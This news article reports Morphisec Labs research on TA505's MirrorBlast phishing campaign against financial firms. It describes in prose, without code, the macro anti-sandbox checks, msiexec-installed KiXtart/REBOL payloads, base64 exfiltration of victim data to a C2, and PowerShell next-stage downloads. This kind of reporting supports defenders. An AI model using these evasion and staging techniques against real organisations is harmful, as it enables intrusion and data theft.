MirrorBlast Campaign Targets Finance Sector Using MacrosTA505 APT Group delivers phishing email containing malicious links
Researchers at Morphisec Labs have published fresh details about a new MirrorBlast campaign that they say is run by a Russia-based threat group TA505, targeting financial services organizations.
The campaign delivers MirrorBlast via a phishing email that contains malicious links that download a weaponized Excel document with embedded macros and which has low detections on VirusTotal, making it dangerous for organizations that depend on detection-based security and sandboxing, according to Morphisec Labs.
Researchers at ET Labs dubbed this campaign as MirrorBlast; they first started tracking this attack campaign in early September. The researchers say there was also a similar activity in April 2021.
The campaign targets multiple sectors including in Canada, the United States, Hong Kong and Europe.
The initial attack chain starts with a malicious email attachment, which changes to the Google feedproxy URL with a SharePoint and a OneDrive lure, which poses as a file share request.
"Such URLs lead to a compromised SharePoint or a fake OneDrive site that the attackers use to evade detection, in addition to a sign-in requirement (SharePoint) that helps to evade sandboxes," the researchers note.
These compromised SharePoint and fake OneDrive sites share a weaponized Excel document with an extremely lightweight macro code that can be executed only on a 32-bit version of Office due to compatibility issues with ActiveX objects (ActiveX control compatibility).
"The macro code performs anti-sandboxing by checking if these queries are true: computer name is equal to the user domain; and username is equal to admin or administrator," the researchers note. "We have observed different variants of the document; in the first variants there wasn’t any anti-sandboxing and the macro code was hidden behind the Language and Code document information properties. Later it moved to the sheet cells. In addition the code has added one more obfuscation layer on top of the previous obfuscation."
Upon execution, the command executes JScript, which spawns the msiexec.exe process responsible for downloading and installing the MSI package. Researchers observed two variants of the MSI installer - KiXtart and REBOL - which are generated using the Windows Installer XML Toolset (WiX).
"Once executed they drop two files into a random directory in ProgramData. One of them is the legitimate software language interpreter executable (KiXtart or REBOL) and the other is the malicious script," the researchers note.
The Rebol variant is a cross-platform data exchange language and a multi-paradigm dynamic programming language, whose first stage Rebol script is base64 encoded, researchers say. It then exfiltrates targeted information by sending a base64 encoded GET request that represents the user domain, username, OS version, architecture, along with a Rebol script build number.
The command and control sends back a Universally Unique IDentifier associated with the victim machine and waits for further commands. Upon receiving a response, it executes a Powershell command that downloads an archive file and extracts its content to a folder named archive, where the next stage of the Rebol script is executed.
"We have also observed a newer version of Rebol script (build=1.0.2) that omits the Powershell execution part. Instead, it implements the same logic with Rebol language code; this is done to decrease noise and script size (no PowerShell process execution as part of the attack chain). At the time of writing, we couldn’t retrieve the next stage Rebol script (payload.rb)," the researchers state.
The KiXtart, a free-format scripting language with a rich built-in functionality for easy scripting, sends the victim’s machine information (domain, computer name, user name, process list) to the C2 and the C2 responds with a further process, as with the Rebol variant.
Attribution to TA505
The researchers say that Russia-based threat group TA505, an advanced persistent threat group, is behind this new MirrorBlast campaign, which has similarities to the attack chain in terms of tactics, techniques and procedures.
"The similarities extend to the attack chain, the GetandGo functionality, the final payload, and similarities in the domain name pattern," researchers say. “Using SharePoint/OneDrive lure theme and using cdn*dl*fileshare, *onedrive* or *dropbox* as part of the domain name are among other similarities.”
TA505, which is also referred to as Hive0065 by IBM X-Force, is a financially motivated cybercrime group that has been active since at least 2014 and believed to be operating out of Russia (see: TA505 Group Targeted Corporate Networks With RAT: Report).
"TA505 is one of many financially motivated threat groups currently active in the marketplace. They are also one of the most creative, as they have a tendency to constantly shift the attacks they leverage to achieve their goals. This new attack chain for MirrorBlast is no exception for TA505 or for other innovative threat groups," researchers note.
In March 2020, the security firm Proofpoint reported that that TA505 was using COVID-19 as a lure to target U.S. healthcare, manufacturing and pharmaceuticals industries, spreading malware and ransomware.
"If anything, the shift in the attack chain is a further indication that organizations can ill afford to take a defensive, reactive approach to their security. They must remain constantly vigilant, iterating on security procedures to ensure they are not caught off-guard when new TTPs are deployed to breach their defenses," the researchers warn.
Other TA505 Related Incidents
Also in March 2020, cyber intelligence firm Prevailion found that the TA505 group was using Trojanized resumes to target German enterprises to compromise networks and conduct business email compromise fraud (see: BEC Campaign Targets HR Departments: Report).
The cybercriminal gang has also been implicated in large-scale spam campaigns, and the distribution of Trojans such as Dridex and The Trick as well as Locky and Jaff ransomware, according to researchers (see: TA505 APT Group Returns With New Techniques: Report).
In December 2019 two members of the TA505 gang, also referred to Evil Corp., were charged with computer and fraud offenses by U.S. and U.K. law enforcement officials. Both men are believed to be living in Russia (see Two Russians Indicted Over $100M Dridex Malware Thefts).